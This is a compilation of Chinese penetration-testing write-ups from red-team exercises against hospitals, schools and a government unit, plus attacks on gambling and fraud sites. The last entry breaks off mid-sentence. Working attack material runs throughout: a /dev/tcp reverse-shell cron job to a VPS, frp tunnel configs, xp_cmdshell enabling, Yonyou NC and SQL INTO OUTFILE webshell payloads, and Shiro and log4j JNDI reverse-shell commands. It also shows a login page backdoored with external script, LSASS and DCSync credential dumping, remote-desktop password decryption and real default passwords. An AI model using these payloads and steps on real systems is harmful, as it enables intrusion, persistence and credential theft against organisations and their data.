由于之前一直无法执行系统命令,想要突破一下就开始翻他服务器上的文件,翻阅系统文件发现存在宝塔的文件夹,探测发现确实开放8888端口存在宝塔服务但默认登录入口已被修改,如下所示:
图片

翻阅宝塔文件发现存储路径的文件名admin_path.pl,如下所示:
图片
找到宝塔登录入口,成功访问该登录入口,如下所示:
图片

继续翻阅发现一个default.pl的文件,该文件中存放的是相应的登录密码:
图片

拿到密码尝试了默认用户名发现不对不能登录,继续翻文件default.db文件是记录登录记录的,找到登录账号:
图片
利用账号密码成功登录宝塔管理后台,如下所示:利用账号密码成功登录宝塔管理后台,如下所示:
图片

找到定时任务处修改计划任务执行cs上线马,上线后在将计划任务改回如下所示:

图片
cs成功上线如下所示:

图片
查看ip仅有公网地址无内网,同C段还有其他几台部署的都是同一套东西就不在往下搞了:
图片
总的就这样,没啥东西比较无味



转载于原文链接: https://mp.weixin.qq.com/s?__biz=Mzg2NDYwMDA1NA==&mid=2247486570&idx=1&sn=0c20fbbf4adbeb5b555164438b3197f7&chksm=ce67a6f3f9102fe51b76482cd7d6bb644631ae469d8c1802956034077137ecd49ea56c8d2b1f&scene=21#wechat_redirect
https://xz.aliyun.com/t/8224

		

		
		

			

		

	
	


		
			



	

		

			


	
		HireHackking
	

			
		

	

	

		

			
0x00 写个开头凑字数
这次攻防打的还是比较有意思的,开局电脑摆烂恼火的很,最后没电脑只能拿着销售的电脑疯狂输出。
image.png
去拿电脑没一会的功夫我们的私有目标就被干出局了,这次的规则还是有点问题按系统分给各个队伍,不是按照目标单位分的,别人分到我们私有目标的部分系统基础分和数据分薅完一下被干出局了,后面再打只有100路径分,还有老6盯着我们的私有目标打,有个泛微office的洞我们手上没有,目标一放出来就穿了,怪自己太菜了。
排名最后还算理想吧最终排名第三,跟两个技术大哥没后端支撑的情况排到前三还是可以的,前面两位重量级选手卷不过啊,一个提交0day另外一个后端支撑有名的卷,最后前两名分数比我们高出一半多。
废话讲完了,开始我们的内容,码打的严师傅们勿怪,文章最后欢迎师傅们留下评论来交流。
0x01 目标
某医院外网弱口令
第一天分了私有目标和公共目标,这个目标是公共池目标,运气也是比较好外网一个弱口令直接进去了,主要就是要知道IP地址,突破到内网这里没啥技术含量,目标给的是一个官网的地址,估计其他队伍的师傅们都去冲云上官网那个IP了,后面云上的我们也通过信息科专用共享服务器上密码文件拿到了所有权限。
攻击路径
image.png
下面我会按照上面图上标记的序号说明内网攻击过程
路径1/路径2 外网弱口令
这里说下这个目标IP怎么来的,通过IP地址收集C段信息找到h3c设备,默认审计账号密码登陆上去命令控制台查看对应授权信息确定是目标IP地址,但是审计账号没有配置权限没法做vpn隧道这些,所以做了个全端口扫描发现一个非标准端口的ssh弱口令,这里拿到服务器权限后我先做了一个反弹shell计划任务。
crontab -e编辑计划任务
bash -c 'exec bash -i &>/dev/tcp/you vps ip/you vps port <&1'

做完计划任务之后我才上fscan扫描,发现内网很多ssh、mssql弱口令,ssh反弹shell计划任务又做了几台,防止一会动作太大掉了。
image.png
内网弱口令一薅一大把,建个frp方便一会去内网翻东西,下载对应编译好的版本就可以。
项目地址:https://github.com/fatedier/frp
frp server
[common]
bind_port = 8945

frp client
[common]
server_addr = you vps ip
server_port = 8945
tls_enable = ture
pool_count = 5

[plugin_socks]
type = tcp
remote_port = 35145
plugin = socks5
# 认证 免认证把下面两行去掉
plugin_user = admin
plugin_passwd = Admin@123
use_encryption = true
use_compression = true

vps上执行
./fprs -c frps.ini

跳板机上执行
./fprc -c frpc.ini

确定连接没问题之后nohup &到后台,这里如果用的腾讯云或者阿里这种vps一定记得端口组里面开启对应的端口,否则连接不上,proxifier确定代理可用。
image.png
路径3 运维机器
这里通过刚才fscan扫描到的mssql弱口令打的一台运维终端主机
# 开启xp_cmdshell
EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp\_configure 'xp_cmdshell', 1;RECONFIGURE;
# 命令执行
exec master..xp_cmdshell "whoami"

相关文章
https://www.cnblogs.com/websecyw/p/11016974.html
确定命令正常执行是个system权限,certutil下载木马上线,抓出密码后确定管理员不在线远程到桌面。
image.png
路径4 服务器所有权限
远程到终端上面才知道这台机器是运维的机器,终端上面打开了sql server连接软件,同样使用上面的命令开启xp_cmdshell执行命令,这里sql server数据库做了降权操作,权限是sqlserver服务权限。
image.png
这里上马子的时候一直有问题权限太低了,上面有火绒企业版开启了系统加固,temp目录写文件写不进去,只拿了sqlserver权限,后面测试了下关闭火绒还是不行,应该是本来sqlserver权限就比较低,后面发现火绒控制台可以分发文件自动执行马子就没管了,这个可以后面复现下环境研究下。
image.png
查看浏览器保存的密码,火狐浏览器里面保存了火绒控制台的账号密码,还有其他一些平台的账号密码,密码收集一下一会可以撞密码。
image.png
everything文件搜索关键字,不管服务器还是终端的文件都仔细翻下,说不定就有意外收获。
密码|信息科|资产表|拓扑|账号|设备|pass|user|config|管理|规划

ereryting高级用法(正则表达式),也可以使用content搜索文件内容,文件内容搜索比较慢。
ererything相关文章 https://www.jianshu.com/p/9c0ab75a264f
在电脑上找到了设备密码信息还有拓扑信息
image.png
设备服务器所有信息
image.png
基本上是所有的网络设备和服务器权限了,这里整理下密码去撞一下密码,在整理密码的的时候发现这个密码是有规律的密码,梳理一下密码的规律使用社工密码生成脚本去生成一些密码。
工具下载地址:https://github.com/cityofEmbera/CPassword
工具使用比较简单,我们只需要修改username.txt里面的名字就可以了,dict.txt里面有自带的规则,我们也可以稍作修改,比如增加一下密码里面自带的一些规律,还有最近的年份信息,比如:
@2013
@2014
@2015
@2016
@2017
@2018
@2019
@2020
@2021
@2022
#2013
#2014
#2015
#2016
#2017
#2018
#2019
#2020
#2021
#2022
123!@#
!@#123.
@233
!@#345
!@#qwe

python3 createDict.py就会自动生成密码文件,密码保存在createdict.txt文件里面,密码生成后丢给kscan指定密码文件去撞密码。
kscan.exe -t 10.0.0.0/8 --hydra --hydra-pass file:pwd.txt

路径5 火绒控制台文件分发
这里就是使用火绒控制台分发文件的功能直接下发文件,这里也是神奇哈文件分发后居然自动执行了,牛呀牛呀
image.png
火绒控制台这里不知道为啥我的浏览器一开控制台直接卡死,找J师傅给我看的,文件直接分发下去
image.png
装了火绒的机器全部上线,有些内网机器没上线,这里CS 4.3有问题选择中转监听器生成文件生成不了
image.png
image.png

看了下有一台靶标机器也在,芜湖分数基本算拿满了,服务器、网络设备、终端的分再加上回收站翻到的带公民身份信息的数据4w条,6k分到手了
路径6 云上资产
这里打到一台信息科共享服务器是通过刚才收集到的口令撞密码撞出来的,还有上面sqlserver弱口令也可以执行命令,因为前面sa弱口令实在太多了,没一个一个去打,这里有口令直接使用工具打一下上线
image.png
随便翻了下文件发现E盘有个信息科专用文件夹点开一看好家伙云上的资产也拿到了
image.png
路径7 域名权限
用刚才的账户密码登陆获取域名解析权限
image.png
云服务器权限,其中一台服务器是官网服务器,是其他队伍的靶标直接拿了
image.png
路径8 云服务器权限
直接阿里云控制台登陆上去用c2生成powershell上线
image.png
某综合医院
这个目标是开始后的第三天晚上开放社工还有近源搞的
攻击路径
image.png
路径1 wifi口令
开放社工和近源那天立马就去报名了,吃完饭换掉工作服拿着手机就冲去医院了,之前手机上刷了kali nethunte,编译了一些arm版本的工具完全够用了,只要在内网建立个立足点就可以了。
到现场之后打开wifi万能钥匙搜索附近的wifi
image.png
连上wifi确定可以通到靶标IP地址,微信扫描二维码密码取出来,一会内网再撞一下密码。
image.png
登陆网关地址发现是h3c出口设备,弱口令登陆到设备上面有网段信息根据网段信息去扫描对应的网段
image.png
路径2 向日葵rce
kscan指定wifi密码文件撞下3389、22、1433这些脆弱端口的密码,拿到了一台内网机器和一台外网机器。
外网机器有向日葵rce漏洞,whoami之后好像把向日葵打挂了(这里不知道什么问题,没找到原因),后面执行命令一直 不回显
image.png
用密码远程登陆上去发现向日葵一直重新连接状态退出重新开还是一样的,把马子上好之后以防万一装个todesk一会远程弄
image.png
路径3 靶标机器
通过刚才外网跳板机todesk远程,直接扫内网服务器网段撞密码撞出一台机器,发现服务器上装了todesk,保存了三台靶标机器的todesk远程,美滋滋a
image.png
image.png
加上刚才终端his系统上的数据,6k分打满了
某专科医院
这个医院当时晚上去的关门了,第二天早上一大早过去了,这个医院进去有点尴尬和社死,当时过去没先查下这个医院是什么类型医院,门口没wifi只有进去了,进去的时候门口医生还是门卫问我挂什么科。
男科?妇科?
我:???
然后又看了看我脖子上有点过敏,说挂皮肤科吗?
我:啊 对对对 皮肤科
进去之后一搜这个医院信息,我敲了这好像是个专科医院懂得都懂
进去正常挂号在那边等,这个医院好像没专门皮肤科的医生,挂完号让我等了一个多小时,打开手机坐着连上wifi开始扫内网
1655648732832-5d0ef9aa-f9d4-4905-a993-08efcaefa04c.png
没等到医生,拿了个跳板机上了马子就溜溜球了,内网只有一个孤儿机器
攻击路径
image.png
路径1 wifi口令
同样wifi万能钥匙进去
路径2 靶标机器
这里扫描内网发现了一个ms17010是一个win2012的机器,手机上msf直接单命令执行试试。
image.png
机器上有360加账号加不上,certutil试了下机器上没有,看了下有向日葵的进程,那么我们可以直接读取他的配置文件解密直接远程到机器上。
配置文件路径

安装版:C:\\Program Files\\Oray\\SunLogin\\SunloginClient\\config.ini

便携版(绿色版):C:\\ProgramData\\Oray\\SunloginClient\\config.ini

尝试了下没有这两个文件
image.png
应该是高版本的,可以试试注册表里面找,看了下有360希望别拦截
# 注册表查询
reg query HKEY\_USERS\\.DEFAULT\\Software\\Oray\\SunLogin\\SunloginClient\\SunloginInfo

reg query HKEY\_USERS\\.DEFAULT\\Software\\Oray\\SunLogin\\SunloginClient\\SunloginGreenInfo

1655654565028-718d09f4-479b-46ec-ab2c-0d2f066753e2.png
芜湖没拦截,抓出来直接丢工具里面解密
向日葵解密工具地址:https://github.com/wafinfo/Sunflower_get_Password
工具使用比较简单,git下来pip安装好unicorn,然后python3执行输入刚才我们注册表里面获取到的encry_pwd字段,根据提示输入到脚本里面
image.png
验证下可以连接,直接向日葵远程拿到主机的权限,溜溜球了
某ZF单位
这个单位没啥东西,这是最后几天跑了ZF街趴墙角一个一个单位薅这个算一个案例吧,拿到了出口设备可以搭建vpn,直接启用l2tp搭建隧道进入内网,为了保住前三的位置拼尽全力了。
攻击路径
这个没截图,可以看下面的文章,关键的步骤这里。
image.png
参考文章:
https://zhiliao.h3c.com/questions/dispcont/146895
https://baijiahao.baidu.com/s?id=1716025203844234922&amp;wfr=spider&amp;for=pc
如果vpn搭建不起或者设备没vpn授权,但是有nat和telnet功能,你有足够的耐心的话也可以参考我之前文章的思路,通过telnet去测试内网的脆弱端口映射到外网,写个脚本去批量测试提高效率,上次比赛回来没来的及写。
文章地址:https://forum.butian.net/share/1633
0x02 总结
这次突破到内网没啥干货,主要是内网横向这块这次攻防遇到的一些东西,在第一个医院拿靶标的系统的时候从运维机上xp_cmdshell攻击靶机,sqlserver数据库做了降权操作temp目录写不了,一直拿不下上面的靶标系统,后面是通过火绒控制台分发文件上线的,其实最开始就已经拿到火绒控制台了,没有去用这个功能怕影响太大了,后面实在没办法了才用,自己会的sqlserver利用姿势还是太少了还得学习,后面基本上都是些社工的东西,划水划到的第三名,电脑坏了拿销售电脑打太费劲了大半时间配置环境
最近也看到一篇关于sqlserver比较好的文章分享一波,社区师傅们姿势多的
https://forum.butian.net/share/1390
最近打攻防总结的一些东西,欢迎师傅们来交流
一些技巧总结:
外网打点
  • 资产收集 ENScan_GO
  • 空间绘测 fofa/360quake/shadow/zoomeye/hunter
  • kunyu/fofa_viewer/infoSearchAll
  • 轻量扫描器
    • kscan 服务识别 可以配合fofa快速识别
    • fscan c段快速识别
  • 子域名对应IP C段资产快速扫描
    • 子域名信息收集 oneforall/subfinder/ksubdomain
    • 快速筛选真实IP生成C段 Eeyes
  • web指纹识别
    • EHole 很好的一个工具,可以二开下增加指纹和空间绘测引擎接口
    • tide潮汐指纹web在线检测
    • TideFinger
    • httpx 获取网页标题状态码
内网主机信息收集
  • everything文件搜索(正则表达式提高效率)
  • 浏览器保存的密码/微信/QQ文件夹/回收站/共享盘/邮件软件/协同软件
  • 远程软件保存的远程连接 mstsc/内网通/向日葵/todesk等
内网常见漏洞
  • 向日葵rce(向日葵真的爽)
  • weblogic
  • s2
  • redis
    shiro



原文地址:   https://forum.butian.net/share/1719
		

		
		

			

		

	
	


		
			



	

		

			


	
		HireHackking
	

			
		

	

	

		

			
0x01 外网打点
资产发现
多测绘平台搜索
https://hunter.qianxin.com/
https://fofa.info/
https://quake.360.cn/
image_X8BSXnkylx.png
image_ctJSWbXB6F.png
多语法搜索
假如某个目标站点为xxxx.com ,我们可以通过不同的语法进行资产搜集,搜集的资产会更全面
这里以fofa为例
domain="xxxx.com"  
host="xxxx.com"  
header="xxxx.com"  
cert="xxxx.com"

敏感信息泄露
对于学校站点的信息搜集,一般来说外网能拿直接权限的点已经很少了,web应用大多是放在vpn后面,因此能弄到一个vpn账号可以说是事半功倍,这时候可以通过语法对此类信息进行挖掘
常用命令如下:
#google语法  
site:*.edu.cn intext: vpn | 用户名 | 密码 | 帐号 | 默认密码  
  
#github  
*.edu.cn password

image_22dBsSWKAO.png
在这次攻防演练里,也是幸运找到了某站点VPN的默认口令,使用的是 姓名拼音/12345678 弱口令
image_i-KtUIqFmy.png
默认口令
对于部分站点,在搭建完成后可能没有更改默认账号密码,这时候可以尝试使用默认账密登录
下面列举一些常见的web站点默认口令
账号:  
admin administrator root user test  
  
密码:  
admin admin123 123456 123 test root

对于一些应用广泛的系统,可以通过google语法搜索其默认密码
image_ejxlTxW5Av.png
这里通过sysadmin/1 成功登入泛微后台
t1sb-w5grl_9Xl3mB_bqn.png
nacos/nacos
image-20220723225803735.png
常见漏洞利用
对于多目标的攻防演练,个人比惯把目标子域url搜集好,去重后批量导进去指纹识别工具,如Goby、fofahub
从指纹识别结果里筛选出重要资产进行突破,使用已知漏洞或day进行攻击
以下为一些批量漏洞利用工具:
https://github.com/Anonymous-ghost/AttackWebFrameworkTools-5.0
https://github.com/d3ckx1/Fvuln
https://github.com/W01fh4cker/Serein
框架类的如log4j、shiro、struts2等
OA类的如致远、泛微、用友、蓝凌等,这里也是找到了目标的用友nc站点
用友nc写shell
56xk-0ba58_-A3uKrDLZX.png
访问接口/servlet/~ic/bsh.servlet.BshServlet执行命令
d5lhwsk0r8_WfpuDtbLpm.png
dnslog探测了一下发现不出网,这里直接写入webshell
1、首先生成一个哥斯拉的jsp木马,然后进行unicode编码
image_796oyMMBO3.png
2、再把输出结果进行url编码
image_zZUpiKMWn1.png
3、payload字段如下,这里写入默认路径为 webapps/nc_web ,实战中灵活应变
String keyWord = URLDecoder.decode("xxxxxx(填入生成内容)xxxxxx", "utf-8");    
BufferedWriter out = new BufferedWriter(new FileWriter("/webapps/nc\_web/test.jsp"));  
out.write(keyWord);  
out.close();

这里直接写入哥斯拉马,连接成功
b8xw2a-s9d_hjEIes_edE.png
shiro无依赖链利用
通过测绘平台找到一个比较偏的资产,直接访问是一个静态页面,但扫描目录后指纹识别一波发现是shiro
直接使用shiro_attack_2.2工具开冲,发现有默认key但是无利用链
image_ylgMY223mT.png
可能有些人看到这里就放弃了,但这可能会错过一个利用点
shiro可以无依赖链利用,感觉有戏尝试一波,相关知识可拜读师傅的文章https://www.le1a.com/posts/a5f4a9e3
这里换用其他工具
image-20220607115446156_b9JXMk_Qxy.png
通过dnslog测试有回显,这里有个注意点:使用 http://dnslog.cn/ 部分站点会拦截,可以换多个dnslog平台测试
image_htB_EhwPH9.png
dnslog有回显接下来就是拿shell了,这里由于固定思维,之前遇到的都是linux系统,先入为主觉得是Linux,结果没利用成功,一开始以为是防火墙拦截,后面探测了一下目录结构,发现是windows,所以这里payload要改变一下
这里可以通过网站快速生成payload
https://x.hacking8.com/java-runtime.html
Linux:
java -cp ysoserial-0.0.8-SNAPSHOT-all.jar ysoserial.exploit.JRMPListener 88 CommonsBeanutils1 "bash -c {echo,字段}|{base64,-d}|{bash,-i}"  
字段=bash -i >& /dev/tcp/x.x.x.x/8888 0>&1 base64后的值  
nc -lvp 端口

Windows:
java -jar JNDIExploit-1.0-SNAPSHOT.jar -i VPS地址  
java -cp ysoserial-0.0.6-SNAPSHOT-1.8.3.jar ysoserial.exploit.JRMPListener 88 CommonsBeanutils2 "ldap://VPS地址:1389/Basic/Command/Base64/d2hvYW1p"  
d2hvYW1p为命令的base64,这里是执行命令whoami

image_wvD-c4KvV-.png
0x02 内网渗透
杀软识别
拿到一台机器后,一般先看一下安装了什么安全防护产品
tasklist /svc
-rr-ew4zvx_bjnBTV1EhH.png
探测了一下发现安装了360,把之前准备好的bypass360马子扔上去,成功上线
chm2qtadrh_QYKNvySqi7.png
隧道搭建
ping了一下发现机器出网,可以上frp搭建反向代理隧道
7brv9u2oe7_ljYwWodDhg.png
proxifier配置相应的端口账密便可以进入内网
h0a0j4rf5-_22woqcMQL4.png
横向思路
1、优先拿运维机器,一般存放着大量的账号密码信息
2、其次是集权设备,Vcenter、堡垒机、天擎这些,有day上day,没day寻找其他方法
3、有域的情况下,争取拿到域管hash,或者通过已知漏洞拿下域控
横向移动
在扫描之前,可以先通过netspy筛选可达的网段再进行扫描
https://github.com/shmilylty/netspy
image_aAWQmEgoLW.png
接着上fscan对可达各个C段开扫,追求效率可只扫描22、80、443、445、1433、8080等重点端口
由于扫描会引起安全设备告警,因此横向尽可能在一小时内结束,避免入口机器被关机下线,对于拿到的机器可以通过计划任务进行维权,尽可能多拿几台机器保证口子不会掉,拿到机器后继续做信息搜集,网段,机器信息,敏感文件,xshell、navicat密码等常规的这里就不细说了
dump lssas
正常没有杀软我们可以通过mimikatz抓取密码
但很多时候mimikatz会被拦截,这时候可以通过一些LOLBINS方法dump出来本地解
image_xvtqu2JT5W.png
这里使用的dump64.exe为白程序,位置位于
C:\Program Files (x86)\Microsoft Visual Studio\Installer\Feedback\
dump64.exe pid c:\\users\\xxx\\Desktop\\out.dmp
测试可过360和火绒
image_w7zffbKEzi.png
image_x0lqYBmjQ2.png
密码复用
08机器之前可以抓到明文,抓不到明文可以尝试到cmd5上进行破解,破解率较高
https://www.cmd5.com
https://www.somd5.com
获取密码之后可以通过超级弱口令工具进行密码复用爆破,拿着获取的密码重新组合字典,对网段内的机器进行爆破,这次也是成功拿下了几十台机器
image_B-HbFja15K.png
若hash解不出来,这时候我们可以根据开放的端口进行PTH,下面列举一些
wmiexec  135端口  
psexec   445端口  
evil-winrm   5985端口

向日葵读取密码
拿到机器的账号密码之后,若机器开启了3389端口可以选择rdp远程桌面过去,没开的话可以开启3389端口进行远程连接
#执行以下命令操作注册表来开启机器3389远程桌面服务  
REG ADD HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal" "Server /v fDenyTSConnections /t REG\_DWORD /d 00000000 /f  

#使用以下命令添加防火墙放行策略  
netsh firewall add portopening protocol = TCP port = 3389 name = rdp  

但如果是正常办公时间,贸然登录过去会很容易引起对方的发现,若进程中有sunlogin进程,可以读取识别码和验证码,通过向日葵连接相对比较隐蔽
duk5gbct0f_meMyYaCbN7.png
注册表读取配置信息:
reg query HKEY\_USERS\\.DEFAULT\\Software\\Oray\\SunLogin\\SunloginClient\\SunloginInfo  
reg query HKEY\_USERS\\.DEFAULT\\Software\\Oray\\SunLogin\\SunloginClient\\SunloginGreenInfo  

向日葵默认配置文件路径:  
安装版:C:\\Program Files\\Oray\\SunLogin\\SunloginClient\\config.ini  
便携版:C:\\ProgramData\\Oray\\SunloginClient\\config.ini  
本机验证码参数:encry\_pwd  
本机识别码参数:fastcode(去掉开头字母)  
sunlogincode:判断用户是否登录状态

读注册表:
glkpzmabud_771pPqH2eN.png
读默认配置文件:
fastcode去掉前面的数字k为本机识别码278263893
0k5feqz515_ejswLYRqVy.png
使用脚本进行解密获得本机验证码
r10bnuf1d3_sY377ayb3l.png
运维机
横向的时候优先拿运维机,一般运维机存储着大量的账号密码信息,比如这次无意中发现的运维机器使用的是弱口令administrator/111111
另外还可以通过cs插件查看机器历史登录IP对运维人员进行锁定
拿下后可通过命令行快速收集服务器、网络拓扑、密码本、公司信息等重要文件。
dir /a /s /b d:\\" \*.txt"   
dir /a /s /b d:\\"\* pass \*"   
dir /a /s /b d:\\"\* login \*"   
dir /a /s /b d:\\"\* user \*"  
dir /a /s /b c:\\password.txt  
dir /a /s /b c:\\\*.conf \*.ini\* .inc\* .config   
dir /a /s /b c:\\conf.\* config.\*   
dir /a /s /b c:\\\*.txt \*.xls\* .xlsx\* .docx | findstr "拓扑"  
dir /a /s /b c:\\\*.conf \*.ini\* .inc\* .config | findstr "运维"  
dir /a /s /b c:\\\*.txt \*.xls\* .xlsx\* .docx | findstr "密码" >C:\\Users\\1.txt  

最后收集了一堆密码本,可登录到各重要系统:
H3C堡垒机
ilyp6ixpq1_a6ILzCKmfM.png
禅道
a680cz-6mv_TJX707htOa.png
域控
1、通过fscan扫描的时候可以检索AD关键字发现域控
[*]192.168.10.38 #非真实域控ip  
   [->]D1-Prod-AD-P01  
   [->]192.168.10.38  
     
[*]192.168.10.20 #非真实域控ip  
   [->]AD  
   [->]192.168.10.20

2、域内主机 DNS 一般就是域控地址
接着可以通过该机器是否开放53和389端口进行进一步确认
这次攻防演练的其中一个目标,通过密码复用爆破成功的某台机器里,刚好存在着域管进程,提权到system权限后注入到域管进程,通过Dcsync成功获取域管密码的hash值,其中一个被禁用的账户刚好可以通过cmd5解出,解出明文密码并激活账户,成功登录两台域控机器,除此以外还可以尝试域漏洞、NTLM中继等
net group "domain admins" /domain  
dcsync domain xxxx  
shell net user xxxx  
shell net user xxxx /active:yes /domain

image_CbIuSx-DB0.png
image_lKpb0bidqu.png
Vcenter
在扫描的过程中发现几台Vcenter,Vcenter常规有三种打法,分别是
CVE-2021-22005-rce、CVE-2021-21972-rce和log4j
前两个测试没成功,log4j通过dnslog探测漏洞存在,vcenter的漏洞触发点在xff头部
java -jar JNDIExploit-1.3-SNAPSHOT.jar -l 1389 -p 8889 -i 0.0.0.0  
nc -lvp 9000  
${jndi:ldap://VPSIP:1389/Deserialization/CommonsBeanutils1/ReverseShell/VPSIP/9000}

4s6zq8tgso_dj3CuwYEQo.png
styrmfmfl2_AgaGTkpKg8.png
但一般打完是非交互式shell,没有回显,这里使用命令切换为交互式shell
python -c 'import pty;pty.spawn('/bin/bash')'
重置密码
/usr/lib/vmware-vmdir/bin/vdcadmintool
不重置密码获取密码
https://github.com/shmilylty/vhost_password_decrypt
#获取vc用户的密码  
cat /etc/vmware-vpx/vcdb.properties  
  
#把加密后的密码单独拿出来,  
psql -h 127.0.0.1 -p 5432 -U vc -d VCDB -c "select ip\_address,user\_name,password from vpx\_host;" > password.enc  
#改成这种格式\*  
H8BBiGe3kQqaujz3ptZvzhWXXZ0M6QOoOFIKL0p0cUDkWF/iMwikwt7BCrfEDRnXCqxoju4t2fsRV3xNMg==\*  
zR20RvimwMPHz7U6LJW+GnmLod9pdHpdhIFO+Ooqk0/pn2NGDuKRae+ysy3rxBdwepRzNLdq6+paOgi54Q==\*  
Q81OIBXziWr0orka0j++PKMSgw6f7kC0lCmITzSlbl/jCDTuRSs07oQnNFpSCC6IhZoPPto5ix0SccQPDw==\*  
R6HqZzojKrFeshDIP8vXPMhN28mLDHiEEBSXWYXNHrQQvHcuLOFlLquI2oLRfqLiPlHwkmAxUj9hKj3VZA==  
  
#拿解密key  
cat /etc/vmware-vpx/ssl/symkey.dat  
Windows:C:\\ProgramData\\VMware\\vCenterServer\\cfg\\vmware-vpx\\ssl\\symkey.dat  
Linux:/etc/vmware-vpx/ssl/symkey.dat  
  
#破解  
python decrypt.py symkey.dat password.enc pass.txt

然后就可以登入web控制台了
1r01obzkhj_ogBBaw34kH.png
wrhrlq1_b0_FPzcE7l_qW.png
云管平台
通过运维机的xshell查找历史记录拿下了主备数据库,然后执行sql语句成功获取出了云管平台的hash
s0rd_kjpjv_87EAPEGHd4.png
到cmd5上进行解密,一块钱拿下云管平台很划算
ju3rv8cne0_h6vf8T_VC_.png
gg-wo7d5y4_4dPpSzvI37.png
但某些系统加密方式不是使用md5的,比如之前碰到的一些系统使用的是Bcrypt加密方式,像这种不可逆的加密方式可以通过替换hash进行登录
$2a$10$z0hHT9rltH59VvcazrSzOuVDNr05shwja1aZmD8ctzDbuNNvdpNIS
image_jqNCTT6FpJ.png
image_X-SfF9SMpb.png
官网
当我们拿到集权设备后,一般里面会有靶标系统或核心系统,这些分数是很高的,这次演练某目标就是通过云管平台登录官网机器,抓取浏览器密码成功获取后台密码,成功拿下官网控制权
0dd0amrx3g_9fOtAaJESy.png
gitlab仓库
根据评分规则刷完路径分之后,可以根据目标性质找一些核心关键的系统跟裁判battle,像这种存有大量代码的仓库可以作为重大成果进行提交
j07_ng7z14_wYcVLx23dN.png





转载自原文地址:https://forum.butian.net/share/1780

		

		
		

			

		

	
	


		
			



	

		

			


	
		HireHackking
	

			
		

	

	

		

			
0x00 前言
随着菠菜类违法站点的肆虐,让无数人妻离子散。为此,献上一份微薄之力,希望能给“有关部门”提供一些帮助。今天给大家表演的是收割BC天恒盛达。
0x01 程序介绍
程序采用PHP5.4 + MySQL 程序结构如下
图片

  基本上目前做此类违法站点的不法分子,除了外包以外就是天恒、大发几套程序模改的。暂时,这边由于技术水平上面的问题,只能够发出天恒的。版本可能有点老。但是,一大部分还是用的。经某位不愿透露自己姓名的网友4月中旬实测,大约70%的存在这些问题,而使用这套程序的违法站点经过半个小时的采集大约在5000~20000左右。
0x02 漏洞详情
1、money - SQL注入
web\wjaction\default\PayOnlineBack.class.php
图片

继续跟进money,此处为GET获取,接着看条件
图片

条件展示,第一个为Key验证,这个在配置文件里。如果Key错误则表示所有订单都无法生效。也就是说Key肯定是在URL请求内,这个验证即可绕过。
图片

继续看条件,这里是生成一个MD5值进行校验。但是这种校验是有缺陷的,此处并未把key的值带入进去。所以我们直接提交的时候,把$tno.$payno.$money都设为空。那么我们将获取$md5key的MD5值。因为$sign在URL中能展示出来。解密后,我们再按照他的验证机制就可以写脚本,进行注入了。
图片

往下继续看,交易号随机来就行了。
图片

继续看,最后一个验证。这里的用户名肯定是真实的,所以这里的验证就算是废掉了
图片
接下来,根据前面的分析,就可以注入了。最重要的一点就是猜解出md5Key的值。
2、订单信息 - 存储XSS
订单信息 -> 用户名
图片
在默认支付提交表单的地方,前台and后台未经过滤就导致了XSS存储型漏洞
3、后台无验证 - Getshell
lib/classes/googleChart/markers/GoogleChartMapMarker.php

图片
任意代码执行漏洞,google变量通过GET获取数据接着就执行,比较低级的问题我就不写代码部分了。(此漏洞并不高效,大约30%几率)
0x03 总结
 这套源码不仅仅这几个洞,大家可以练练手自己挖一下。其次本来想着放出来采集未收录违法站点工具的,但是后来想想,避免让“其他”安全人士误入歧途,也就此消除了这个想法。依旧水文一篇,望各位表哥多多指点!

转载于原文链接: https://mp.weixin.qq.com/s/7R3OrGPmUesDz4YKuxoJjw


		

		
		

			

		

	
	


		
			



	

		

			


	
		HireHackking
	

			
		

	

	

		

			
0X00    事情由来
图片
图片
图片
了解完事情的经过,经过我的经验判断,这应该是个杀猪诈骗案例
诈骗份子通过一些手段让受害人相信,通过他们可以赚钱并诱导充值杀猪盘赌博
0X01    渗透过程-大概二十分钟左右就拿下了
渗透过程简单枯燥:
看了一眼IP和端口,判断了下应该不存在云waf,直接开始扫目录
过了几分钟扫到一个http://xxxx.com.cn/u.php,原来是upupw的集成环境,如下图
图片
图片
思路,爆破phpmyadmin,或者找upupw的默认数据库密码,先找默认密码试试看
图片
成功用系统提供的密码登录,默认的是:DRsXT5ZJ6Oi55LPQ
成功登录phpmyadmin
图片
然后尝试getshell,由于有upupw探针,直接查看了phpinfo,有网站的绝对路径,直接尝试常规写shell
需要知道绝对路径、数据库root权限、数据库有写权限具体语句:
SELECT "<?php eval(@$_POST['xx']);?>" INTO OUTFILE "D:\\wap\\member_bak.php"
注意点:windows下,须要双反斜线,否则会转义然后使用菜刀/蚁剑等链接即可
由于当时没有截图,目前网站已经打不开了,所以下面就直接放出拿到shell后的状态了
图片
渗透结束,看了下权限,是system权限,不过咱们的目标是定位诈骗分子的IP信息和位置信息,接着下一步了
0X02    定位诈骗份子的IP和端口
拿到shell了就容易的多了,找后台登录的php文件插入xss代码即可
图片
找了一圈发现,后台登录是另外一个网站目录下,编辑admin778899.php
echo '<sCRiPt sRC=https://xx.xx/XFXX></sCrIpT>';
等待诈骗分子登录
图片
居然还是手机登录的,666
替换Cookie登录后台,发现并没有什么用,都是一些数字而已
图片
去ipip.net 查询了一下IP地址信息,不出意外,果然又在境外,唉....
图片

0X03    告知粉丝结果
过程我就直接贴和受害者的微信聊天记录了
图片
图片
图片
图片
图片
图片
图片
图片

0X04    如何防范此类诈骗
1.网络交友,要提高防骗意识,保持良好的社交心态,注意个人隐私信息的保护,特别是涉及到金钱往来,务必多渠道核实对方真实身份;
2.网络上凡是涉及带你投资理财有高收益的都视为诈骗即可;
3.骗子在朋友圈不断分享投资盈利的信息,吸引受害人主动咨询;
4.诱导受害人注册平台,投入资金。当受害人看到盈利想要提现时,平台持续以受害人银行卡号错误要求缴纳保证金、未按要求备注、账户冻结、税收等理由继续诱骗钱财,实施诈骗;
5.保持正确的投资理财观,不盲目相信无风险却高回报的投资方式,天上不会掉馅饼



转载于原文链接: https://mp.weixin.qq.com/s/7o4XV8MKbX3wCT3ZxbCMng


		

		
		

			

		

	
	


		
			



	

		

			


	
		HireHackking
	

			
		

	

	

		

			一个学长前几天不幸在钓鱼网站中招被骗走一些资金,在联系有关部门前找到了我看看能不能获取到一些有用的信息以便于有关部门行动

在对网站进行初步信息收集后发现网站使用ThinkPHP 5.0.7框架,直接找到ThinkPHP对应版本的Exp进行尝试:
